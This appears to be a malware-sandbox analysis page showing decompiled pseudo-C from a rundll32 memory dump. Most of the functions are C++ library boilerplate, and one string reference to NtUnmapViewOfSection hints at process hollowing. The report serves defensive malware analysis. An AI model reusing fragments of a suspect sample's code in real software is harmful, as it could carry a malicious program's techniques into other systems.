                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 9f7d957f0ffcc9841b217795bd5a469e617d2d6f12b071e1f2693da6535ece72
                • Instruction ID: f98c67d53afbabac726312830b956a27d938450cb604960db75a0125d9059d3e
                • Opcode Fuzzy Hash: 9f7d957f0ffcc9841b217795bd5a469e617d2d6f12b071e1f2693da6535ece72
                • Instruction Fuzzy Hash: 04313F33306E60D1EA219B16E5582D96765EBE87E0F184293EE5D077EDCB34D4478704
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215205D9F24(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681c20; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681b60; // 0x0
                				if (_t56 != 0) goto 0x205d9f9f;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681b60 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205d9f8e;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681b60 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681b60; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d9fb3;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205d9fb5;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205da042;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d9fdb;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d9fd9;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205d9fdb;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205da042;
                				if (_t79 == 0) goto 0x205d9fea;
                				goto 0x205da042;
                				E00000215215205DC920(0, 0, _t57,  &_a24, _t80, _t79, _t80);
                				if (_t53 != 0xffffffff) goto 0x205da019;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681c20 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}




















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 09c5cb08fecbd01b7dc821f050fd5a8b41e5a42a18643bed1a065b9555427e60
                • Instruction ID: 40559181da53615e0b3b040b11dc491f4e87fae1a5bbf400ec29a5c60748aa58
                • Opcode Fuzzy Hash: 09c5cb08fecbd01b7dc821f050fd5a8b41e5a42a18643bed1a065b9555427e60
                • Instruction Fuzzy Hash: 0C314D37306E24C1EA219B26E5582E96365EBE47E0F180293EE5D477EDDF38D8438704
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00000215215205C7C20(signed int __edx, void* __eflags, void* __rcx) {
                				void* _v72;
                				signed char _t8;
                				signed int _t10;
                
                				_t10 = __edx & 0x00000017;
                				 *(__rcx + 0x10) = _t10;
                				_t8 =  *(__rcx + 0x14) & _t10;
                				if (__eflags == 0) goto 0x205c7c4c;
                				if (r8b != 0) goto 0x205c7c52;
                				if ((_t8 & 0x00000004) != 0) goto 0x205c7c5c;
                				if ((_t8 & 0x00000002) != 0) goto 0x205c7c99;
                				goto 0x205c7cd6;
                				return _t8;
                			}







                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ExceptionThrow
                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                • API String ID: 432778473-1866435925
                • Opcode ID: 630905e449d0313d16b455eea44e9d9020c95c9599d2484d6dfed617e88adc5d
                • Instruction ID: 595a907979af2b88df1faaf9537c0fa1b6059ba7a99d90c084f80e91658f53c4
                • Opcode Fuzzy Hash: 630905e449d0313d16b455eea44e9d9020c95c9599d2484d6dfed617e88adc5d
                • Instruction Fuzzy Hash: BD216D73B12E3AD8FB11DBA4D8496EC2370BFA0758FA05151DE0A1695EEF38D649C340
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00000215215205981E0() {
                				long long _v88;
                				void* _t6;
                
                				_v88 = 0xfffffffe;
                				if (_t6 - 0x21 > 0) goto 0x20598478;
                				goto __rdx;
                			}






                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ExceptionThrow__std_exception_copy
                • String ID: D:\Sources\boost_1_78_0\boost/beast/http/impl/verb.ipp$G$class boost::basic_string_view<char,struct std::char_traits<char> > __cdecl boost::beast::http::to_string(enum boost::beast::http::verb)$unknown verb
                • API String ID: 1552479455-153460152
                • Opcode ID: 31bdc45c81c5188b2c4fd795f0642223dacc3f422662b668c5e521bef64abdb7
                • Instruction ID: 7b29d86005fbb781b34e800c796825d96b61d8d7e6b8ced5a3e71fd922803189
                • Opcode Fuzzy Hash: 31bdc45c81c5188b2c4fd795f0642223dacc3f422662b668c5e521bef64abdb7
                • Instruction Fuzzy Hash: EB211D32206F80D5DB608B44F4883CAB3A5FBD5364F904266EA9C427ACEF7CD259CB40
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$HandleModule
                • String ID: NtUnmapViewOfSection$RtlNtStatusToDosError$ntdll.dll
                • API String ID: 667068680-3998908438
                • Opcode ID: 5d0fd9b13a4954da36a0c31dca8b7b335499681a921842a0448eb2911f3ce383
                • Instruction ID: d4b0779ceaf8a7d54ebce75b0fdb60bd1ce5a5b912f34bf67c957af54487807c
                • Opcode Fuzzy Hash: 5d0fd9b13a4954da36a0c31dca8b7b335499681a921842a0448eb2911f3ce383
                • Instruction Fuzzy Hash: ACF04972706E60C9EA149B12F8480997760ABA8FC0F688071EE4E07768DE38D4898700
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID:
                • API String ID: 3215553584-0
                • Opcode ID: 37e1365720e54c170244ded4e590eddda548868e872759c99f8ceb9b79a3041d
                • Instruction ID: c2ae8a4082212b2cc21201b6f898566dd5ee63c108a0c61ad1e940fa61b84734
                • Opcode Fuzzy Hash: 37e1365720e54c170244ded4e590eddda548868e872759c99f8ceb9b79a3041d
                • Instruction Fuzzy Hash: 6991A373602EB0C5FE308B1594887EDE6A6BFA4FA4F284255DE6A167DCDB34E446C300
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: File$CloseCreateErrorHandleLastModuleNamePointerRead
                • String ID:
                • API String ID: 1442449144-0
                • Opcode ID: 84401a0ac56230bcfb6e49264f68de0f237f74cf7f9d6155b434242987c906bc
                • Instruction ID: a843993312532fd788a31b84424a11bf02f8448fb21bc1e080ddde98232b3c48
                • Opcode Fuzzy Hash: 84401a0ac56230bcfb6e49264f68de0f237f74cf7f9d6155b434242987c906bc
                • Instruction Fuzzy Hash: 6341F433703AB1C6EB648B55955CBE96795BFE0BA8F148160AE8943B98EE3CC804C740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 41%
                			E0000021521520593880(void* __ecx, long long __rbx, long long* __rcx, void* __rdx, long long __rsi, void* __r8, long long _a8, long long _a16, long long _a24) {
                				long long _v16;
                				long long _v24;
                				long long _v32;
                				long long _v40;
                				int _t43;
                				long long _t61;
                				long long* _t64;
                				intOrPtr _t72;
                				long long _t83;
                				void* _t88;
                				intOrPtr _t90;
                
                				_t88 = __r8;
                				_t83 = __rsi;
                				_a8 = __rcx;
                				_v40 = 0xfffffffe;
                				_a16 = __rbx;
                				_a24 = __rsi;
                				_t64 = __rcx;
                				 *__rcx = 0x2063c748;
                				if ( *((intOrPtr*)(__rcx + 0xa8)) == __rsi) goto 0x205938f2;
                				E0000021521520593DF0(0x2063c748, __rcx, __rcx, __rdx);
                				E0000021521520591900( *((intOrPtr*)(_t64 + 0xa8)), _t88);
                				if ( *((intOrPtr*)(_t64 + 0xa8)) == 0) goto 0x205938eb;
                				CloseHandle(??);
                				E00000215215205F51EC(0x2063c748, _t64, __rsi);
                				 *((long long*)(_t64 + 0xa8)) = _t83;
                				if ( *((intOrPtr*)(_t64 + 0xa8)) == 0) goto 0x20593917;
                				CloseHandle(??);
                				E00000215215205F51EC(0x2063c748, _t64, _t83);
                				_t90 =  *((intOrPtr*)(_t64 + 0x90));
                				if (_t90 == 0) goto 0x20593979;
                				_t72 =  *((intOrPtr*)(_t64 + 0x90));
                				if (_t72 == 0) goto 0x2059394a;
                				_t61 =  *((intOrPtr*)(_t72 + 0x20));
                				 *((long long*)(_t64 + 0x90)) = _t61;
                				if (_t61 != 0) goto 0x20593946;
                				 *((long long*)(_t64 + 0x98)) = _t83;
                				 *((long long*)(_t72 + 0x20)) = _t83;
                				_v32 = _t61;
                				_v24 = _t61;
                				_v16 = _t83;
                				r9d = 0;
                				 *((intOrPtr*)(_t90 + 0x28))();
                				if ( *((intOrPtr*)(_t64 + 0x90)) != 0) goto 0x20593923;
                				DeleteCriticalSection(??);
                				if ( *((intOrPtr*)(_t64 + 0x50)) == 0) goto 0x20593994;
                				CloseHandle(??);
                				if ( *((intOrPtr*)(_t64 + 0x48)) == 0) goto 0x205939b6;
                				CloseHandle(??);
                				E00000215215205F51EC(_t61, _t64, _t83);
                				if ( *((intOrPtr*)(_t64 + 0x28)) == 0) goto 0x205939c6;
                				_t43 = CloseHandle(??);
                				 *_t64 = 0x2063c108;
                				return _t43;
                			}















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle$CompletionCriticalDeleteErrorLastMultipleObjectsPostQueuedSectionStatusTerminateThreadWait
                • String ID:
                • API String ID: 1875059124-0
                • Opcode ID: 9aea386166b5a77ba1eca5725480e87a77fe02e2db2055f8ce1ef71ba19c9fa2
                • Instruction ID: eb6681d5b180920487ee90998bde958ae0cc8a8de70ca8e6ee72916d3df78fa0
                • Opcode Fuzzy Hash: 9aea386166b5a77ba1eca5725480e87a77fe02e2db2055f8ce1ef71ba19c9fa2
                • Instruction Fuzzy Hash: 5D41AB33302F64C5EB649F21E498B9963A0FB96F94F185165AE8D07B9CCF38D455C740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 62%
                			E00000215215205DA404(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t37;
                				void* _t44;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t54;
                				intOrPtr _t57;
                				signed long long _t58;
                				intOrPtr _t65;
                				intOrPtr* _t79;
                				long long _t80;
                				void* _t81;
                
                				_t52 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t81 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t80 =  *0x20681c60; // 0x0
                				_a24 = _t80;
                				_t57 =  *0x20681ba0; // 0x0
                				if (_t57 != 0) goto 0x205da47f;
                				E00000215215205D19DC(0,  &_a8);
                				_t44 =  *0x20681ba0 - _t57; // 0x0
                				if (_t44 != 0) goto 0x205da46e;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681ba0 = _t52;
                				_t29 = E00000215215205D1A5C(_t52,  &_a8);
                				_t58 =  *0x20681ba0; // 0x0
                				_t65 = _a8;
                				if (_t58 -  *((intOrPtr*)(_t65 + 0x18)) >= 0) goto 0x205da493;
                				_t53 =  *((intOrPtr*)(_t65 + 0x10));
                				goto 0x205da495;
                				if ( *((intOrPtr*)(_t53 + _t58 * 8)) != 0) goto 0x205da522;
                				if ( *((intOrPtr*)(_t65 + 0x24)) == dil) goto 0x205da4bb;
                				E00000215215205D6CC0(_t29);
                				if (_t58 -  *((intOrPtr*)(_t53 + 0x18)) >= 0) goto 0x205da4b9;
                				_t54 =  *((intOrPtr*)(_t53 + 0x10));
                				goto 0x205da4bb;
                				if ( *((intOrPtr*)(_t54 + _t58 * 8)) != 0) goto 0x205da522;
                				if (_t80 == 0) goto 0x205da4ca;
                				goto 0x205da522;
                				E00000215215205DCC50(_t37, 0, 0, _t58,  &_a24, _t81);
                				if (_t54 != 0xffffffff) goto 0x205da4f9;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t58,  &_v48, 0x2066bb90, _t80);
                				asm("int3");
                				_t79 = _a24;
                				 *0x20681c60 = _t79;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t79 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t54, _t79),  &_a16);
                			}




















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow
                • String ID:
                • API String ID: 1824299764-0
                • Opcode ID: 01a8b33dcf410191560d6fd8069a20cb0a9b66b3e31510c19544a4033c5b5795
                • Instruction ID: 13086f2d0c6575678efdfacfe3bad8bd8d61e327e041713ada38de25ef1ca1a6
                • Opcode Fuzzy Hash: 01a8b33dcf410191560d6fd8069a20cb0a9b66b3e31510c19544a4033c5b5795
                • Instruction Fuzzy Hash: 5D313D37706E24C1EE219B15E5582EA6365EBE47E0F580292AE5D077EDDE38D847C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 62%
                			E00000215215205DA53C(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t37;
                				void* _t44;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t54;
                				intOrPtr _t57;
                				signed long long _t58;
                				intOrPtr _t65;
                				intOrPtr* _t79;
                				long long _t80;
                				void* _t81;
                
                				_t52 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t81 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t80 =  *0x20681c00; // 0x0
                				_a24 = _t80;
                				_t57 =  *0x20681b50; // 0x0
                				if (_t57 != 0) goto 0x205da5b7;
                				E00000215215205D19DC(0,  &_a8);
                				_t44 =  *0x20681b50 - _t57; // 0x0
                				if (_t44 != 0) goto 0x205da5a6;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681b50 = _t52;
                				_t29 = E00000215215205D1A5C(_t52,  &_a8);
                				_t58 =  *0x20681b50; // 0x0
                				_t65 = _a8;
                				if (_t58 -  *((intOrPtr*)(_t65 + 0x18)) >= 0) goto 0x205da5cb;
                				_t53 =  *((intOrPtr*)(_t65 + 0x10));
                				goto 0x205da5cd;
                				if ( *((intOrPtr*)(_t53 + _t58 * 8)) != 0) goto 0x205da65a;
                				if ( *((intOrPtr*)(_t65 + 0x24)) == dil) goto 0x205da5f3;
                				E00000215215205D6CC0(_t29);
                				if (_t58 -  *((intOrPtr*)(_t53 + 0x18)) >= 0) goto 0x205da5f1;
                				_t54 =  *((intOrPtr*)(_t53 + 0x10));
                				goto 0x205da5f3;
                				if ( *((intOrPtr*)(_t54 + _t58 * 8)) != 0) goto 0x205da65a;
                				if (_t80 == 0) goto 0x205da602;
                				goto 0x205da65a;
                				E00000215215205DCD1C(_t37, 0, 0, _t58,  &_a24, _t81);
                				if (_t54 != 0xffffffff) goto 0x205da631;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t58,  &_v48, 0x2066bb90, _t80);
                				asm("int3");
                				_t79 = _a24;
                				 *0x20681c00 = _t79;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t79 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t54, _t79),  &_a16);
                			}




















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow
                • String ID:
                • API String ID: 1824299764-0
                • Opcode ID: e24144342c1bc669cb41d6023af797a8479b99192c235ba69f0a6108fed272c7
                • Instruction ID: f066f39150292b75280eca8023bb408e5eaa4b2f6dd732956917ae1ac1c445fc
                • Opcode Fuzzy Hash: e24144342c1bc669cb41d6023af797a8479b99192c235ba69f0a6108fed272c7
                • Instruction Fuzzy Hash: B8315C37706E60C1EE219B15E5582DA6365EBE47E0F180292EE6D076EDDF38D4438700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215205DA674(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681c68; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681ba8; // 0x0
                				if (_t56 != 0) goto 0x205da6ef;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681ba8 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205da6de;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681ba8 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681ba8; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205da703;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205da705;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205da792;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205da72b;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205da729;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205da72b;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205da792;
                				if (_t79 == 0) goto 0x205da73a;
                				goto 0x205da792;
                				E00000215215205DCDE8(0, 0, _t57,  &_a24, _t80, _t79, _t80);
                				if (_t53 != 0xffffffff) goto 0x205da769;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681c68 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}




















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow
                • String ID:
                • API String ID: 1824299764-0
                • Opcode ID: 4991f436fa3c4e32b2136a0073de4f2a818d2aa20e97c2aecb14420ceab6e43e
                • Instruction ID: f12f3caa5d174b89c6af5b0821c046eb6ca97f469e3b3177333ddc62fce3599b
                • Opcode Fuzzy Hash: 4991f436fa3c4e32b2136a0073de4f2a818d2aa20e97c2aecb14420ceab6e43e
                • Instruction Fuzzy Hash: A8314E37706E20D5EA21AB25E5582EA6365EBE47E0F284293EE5D077EDDE34D443C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215205DA7AC(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681c08; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681b00; // 0x0
                				if (_t56 != 0) goto 0x205da827;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681b00 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205da816;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681b00 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681b00; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205da83b;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205da83d;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205da8ca;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205da863;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205da861;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205da863;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205da8ca;
                				if (_t79 == 0) goto 0x205da872;
                				goto 0x205da8ca;
                				E00000215215205DCEE0(0, 0, _t57,  &_a24, _t80, _t79, _t80);
                				if (_t53 != 0xffffffff) goto 0x205da8a1;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681c08 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}




















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow
                • String ID:
                • API String ID: 1824299764-0
                • Opcode ID: 014138412515c7b3edb4f7246281995acaddc5a7eadf6c72d55ebe91536a86d5
                • Instruction ID: cce2f7a808f4934dbb8ef6bb3c321a3cefa2afe5e4ac8ae1ac0d8384e4cfbd20
                • Opcode Fuzzy Hash: 014138412515c7b3edb4f7246281995acaddc5a7eadf6c72d55ebe91536a86d5
                • Instruction Fuzzy Hash: 4B314C37706E20C1FA219B26E5582E96365EBE4BE0F184292EE5D476EDDE38D8438700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 62%
                			E00000215215205EED84(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t37;
                				void* _t44;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t54;
                				intOrPtr _t57;
                				signed long long _t58;
                				intOrPtr _t65;
                				intOrPtr* _t79;
                				long long _t80;
                				void* _t81;
                
                				_t52 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t81 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t80 =  *0x20681ce8; // 0x0
                				_a24 = _t80;
                				_t57 =  *0x20681ca8; // 0x0
                				if (_t57 != 0) goto 0x205eedff;
                				E00000215215205D19DC(0,  &_a8);
                				_t44 =  *0x20681ca8 - _t57; // 0x0
                				if (_t44 != 0) goto 0x205eedee;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681ca8 = _t52;
                				_t29 = E00000215215205D1A5C(_t52,  &_a8);
                				_t58 =  *0x20681ca8; // 0x0
                				_t65 = _a8;
                				if (_t58 -  *((intOrPtr*)(_t65 + 0x18)) >= 0) goto 0x205eee13;
                				_t53 =  *((intOrPtr*)(_t65 + 0x10));
                				goto 0x205eee15;
                				if ( *((intOrPtr*)(_t53 + _t58 * 8)) != 0) goto 0x205eeea2;
                				if ( *((intOrPtr*)(_t65 + 0x24)) == dil) goto 0x205eee3b;
                				E00000215215205D6CC0(_t29);
                				if (_t58 -  *((intOrPtr*)(_t53 + 0x18)) >= 0) goto 0x205eee39;
                				_t54 =  *((intOrPtr*)(_t53 + 0x10));
                				goto 0x205eee3b;
                				if ( *((intOrPtr*)(_t54 + _t58 * 8)) != 0) goto 0x205eeea2;
                				if (_t80 == 0) goto 0x205eee4a;
                				goto 0x205eeea2;
                				E00000215215205EF680(_t37, 0, 0, _t58,  &_a24, _t81);
                				if (_t54 != 0xffffffff) goto 0x205eee79;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t58,  &_v48, 0x2066bb90, _t80);
                				asm("int3");
                				_t79 = _a24;
                				 *0x20681ce8 = _t79;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t79 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t54, _t79),  &_a16);
                			}




















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow
                • String ID:
                • API String ID: 1824299764-0
                • Opcode ID: 1b6f675c97c9b95ccee983e377406c231770fe02692c3ba2a5b7a75e57c626db
                • Instruction ID: eb8d0dd0027715c155a35e547dc2e530616a315b090c5fc2c0135ad9c11fc8d0
                • Opcode Fuzzy Hash: 1b6f675c97c9b95ccee983e377406c231770fe02692c3ba2a5b7a75e57c626db
